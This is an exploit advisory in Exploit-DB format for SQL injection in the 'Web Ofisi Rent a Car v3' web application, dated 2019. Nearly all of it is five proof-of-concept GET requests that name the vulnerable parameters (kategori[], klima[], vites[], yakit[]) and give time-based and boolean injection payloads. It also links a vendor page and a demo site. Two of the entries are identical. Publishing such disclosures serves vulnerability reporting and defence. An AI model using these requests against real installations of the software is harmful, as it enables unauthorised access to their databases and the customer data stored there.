Share
# Exploit Title: Web Ofisi Rent a Car 3 - 'klima' SQL Injection  
# Date: 2019-07-19  
# Exploit Author: Ahmet รœmit BAYRAM  
# Vendor: https://www.web-ofisi.com/detay/rent-a-car-v3.html  
# Demo Site: http://demobul.net/rentacarv3/  
# Version: v3  
# Tested on: Kali Linux  
# CVE: N/A  
  
----- PoC 1: SQLi -----  
  
Request:  
http://localhost/[PATH]/arac-listesi.html?kategori[]=0&klima[]=1&vites[]=1&yakit[]=1  
Vulnerable Parameter: kategori[] (GET)  
Payload: if(now()=sysdate(),sleep(0),0)  
  
----- PoC 2: SQLi -----  
  
Request:  
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1  
Vulnerable Parameter: klima[] (GET)  
Payload: 1 AND 3*2*1=6 AND 695=695  
  
----- PoC 3: SQLi -----  
  
Request:  
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1  
Vulnerable Parameter: vites[] (GET)  
Payload: 1 AND 3*2*1=6 AND 499=499  
  
----- PoC 4: SQLi -----  
  
Request:  
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1  
Vulnerable Parameter: vites[] (GET)  
Payload: 1 AND 3*2*1=6 AND 499=499  
  
----- PoC 5: SQLi -----  
  
Request:  
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1  
Vulnerable Parameter: yakit[] (GET)  
Payload: 1 AND 3*2*1=6 AND 602=602